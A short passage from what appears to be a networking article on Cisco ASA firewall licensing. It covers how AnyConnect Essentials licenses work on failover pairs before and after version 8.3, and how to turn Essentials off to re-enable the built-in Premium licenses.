Failover: Prior to version 8.3, if you have failover firewalls and are using Essentials licensing you need to purchase an Essentials license for BOTH firewalls. From version 8.3 Cisco allowed the licenses to be replicated between firewalls in a failover pair.
*To re-enable the built-in Premium licenses you need to disable Essentials licensing by using the ‘no anyconnect-essentials’ command, or in the ASDM > Configuration > Remote Access VPN > Network (Client) Access > Advanced > AnyConnect Essentials.
Related Articles, References, Credits, or External Links